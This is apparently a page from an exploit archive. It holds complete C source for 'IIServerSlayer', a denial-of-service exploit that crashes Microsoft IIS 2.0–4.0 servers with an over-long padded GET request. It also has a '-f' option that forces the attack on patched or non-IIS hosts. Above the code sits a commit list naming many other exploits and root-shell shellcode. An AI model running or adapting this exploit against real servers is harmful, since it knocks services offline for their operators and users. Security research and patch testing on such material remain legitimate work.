880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
138 lines
No EOL
4.6 KiB
C
138 lines
No EOL
4.6 KiB
C
// source: https://www.securityfocus.com/bid/2654/info
|
|
|
|
Microsoft Internet Information Server is vulnerable to a denial of service.
|
|
|
|
This particular denial of service affects versions 2.0, 3.0 and 4.0 of the server prior to service pack 4.
|
|
|
|
The URL which causes this issue is of the format "http://server/?anything=XXXXX" - note that no existing file need be requested.
|
|
|
|
This is not a buffer overflow; a URL of specific length must be sent (between 4k and 8k), anything longer or shorter will not affect the server.
|
|
|
|
/* Some days ago I found the page http://www.eden.com/~tfast/jihad.html
|
|
Then I found the java program IIServerSlayer.class made by
|
|
Todd Fast <tfast@eden.com>, the author of the web pages.
|
|
Now I have ported that program in gcc from java using strace and
|
|
disassembling IIServerSlayer.class with javap (part of jdk).
|
|
|
|
For now is tested by me only on Linux 2.1.42 compiled with gcc 2.7.2.2
|
|
and glibc.
|
|
by Andrea Arcangeli <arcangeli@mbox.queen.it> */
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <unistd.h>
|
|
#include <arpa/inet.h>
|
|
#include <signal.h>
|
|
|
|
int s;
|
|
struct sockaddr_in addr, spoofedaddr;
|
|
struct hostent *host;
|
|
|
|
int open_sock(int sock, char *server, int port) {
|
|
struct sockaddr_in blah;
|
|
struct hostent *he;
|
|
bzero((char *)&blah,sizeof(blah));
|
|
blah.sin_family=AF_INET;
|
|
blah.sin_port=htons(port);
|
|
if ((he = gethostbyname(server)) != NULL) {
|
|
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
|
|
}
|
|
else {
|
|
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
|
|
perror("gethostbyname()");
|
|
return(2);
|
|
}
|
|
}
|
|
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
|
|
perror("connect()");
|
|
close(sock);
|
|
return(3);
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
char *generate_die_string(int lenght) {
|
|
char letter='X';
|
|
char *str_begin = "GET /?bye=",*str_end = " HTTP/1.0\r\n\r\n",*str;
|
|
int i;
|
|
str = (char *)malloc(lenght+strlen(str_end)+strlen(str_begin)+1);
|
|
strcpy(str,str_begin);
|
|
for(i=strlen(str_begin);i<lenght+strlen(str_begin);i++) str[i] = letter;
|
|
str[i]=0;
|
|
strcat(str,str_end);
|
|
return (char *)str;
|
|
}
|
|
|
|
void IIServerSlayer(char *target,int lenght,int port,int flags) {
|
|
char buff[2],header[512],*IIS_string = "Server: Microsoft-IIS/3.0";
|
|
char *IIS_patch = "Bad Request";
|
|
int count = 0,return_status;
|
|
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
|
|
perror("socket()");
|
|
exit(1);
|
|
}
|
|
if((return_status = open_sock(s,target,port))) exit(return_status);
|
|
if(lenght) printf("Sending request lenght = %d to %s\n",lenght,target);
|
|
else printf("Sending request to test if %s is a Microsoft-IIS/3.0 server\n"
|
|
,target);
|
|
send(s,generate_die_string(lenght),strlen(generate_die_string(lenght)),0);
|
|
printf("Waiting for the reply from %s\n",target);
|
|
buff[1]=0;
|
|
while(recv(s,buff,1,0) == 1) {
|
|
if(flags & 1) printf("%s",buff);
|
|
else if(!div(count,50).rem) printf(".");
|
|
if(count < 511) header[count]=buff[0];
|
|
count++;
|
|
}
|
|
printf("\n");
|
|
header[511]=0;
|
|
if(strstr(header,IIS_string) == NULL && lenght == 0) {
|
|
printf("This is not a Microsoft-IIS/3.0 web server\n");
|
|
if(!(flags & 2)) exit(0);
|
|
}
|
|
else if(!lenght) printf("Ok, this is a Microsoft-IIS/3.0 web server\n");
|
|
if(strstr(header,IIS_patch) != NULL) {
|
|
printf("This IIS/3.0 web server is patched against this exploit\n");
|
|
if(!(flags & 2)) exit(0);
|
|
}
|
|
close(s);
|
|
}
|
|
|
|
void main(int argc,char **argv)
|
|
{
|
|
int i = 1,port = 80,lenght = 8180,flags = 0,param = 0,pid;
|
|
if (argc < 2 ) {
|
|
printf("Usage: %s [-v] [-f] <target> [string_lenght] [port]\n",argv[0]);
|
|
printf("[-v] = verbose mode to view the server reply\n");
|
|
printf("[-f] = force running over non or patched IIS/3.0 web server\n");
|
|
exit(0);
|
|
}
|
|
for(i=1;i<argc;i++) {
|
|
if(!strcmp(argv[i],"-v")) { param++; flags |= 1; }
|
|
if(!strcmp(argv[i],"-f")) { param++; flags |= 2; }
|
|
}
|
|
if(argc > param+2) lenght = atoi(argv[param+2]);
|
|
if(argc > param+3) port = atoi(argv[param+3]);
|
|
for(i=0;i<3;i++,lenght++) {
|
|
if(i) IIServerSlayer(argv[param+1],lenght,port,flags);
|
|
else IIServerSlayer(argv[param+1],0,port,flags);
|
|
if(i == 1 || i == 0) lenght--;
|
|
}
|
|
if((pid = fork())) {
|
|
if(pid == -1) {
|
|
perror("I can' t fork\n");
|
|
exit(-1);
|
|
}
|
|
usleep(60000000); /* wait for 1 minute */
|
|
kill(pid,SIGTERM);
|
|
}
|
|
else {
|
|
IIServerSlayer(argv[param+1],lenght,port,flags);
|
|
printf("Sorry, %s is alive yet\n",argv[param+1]);
|
|
}
|
|
exit(0);
|
|
} |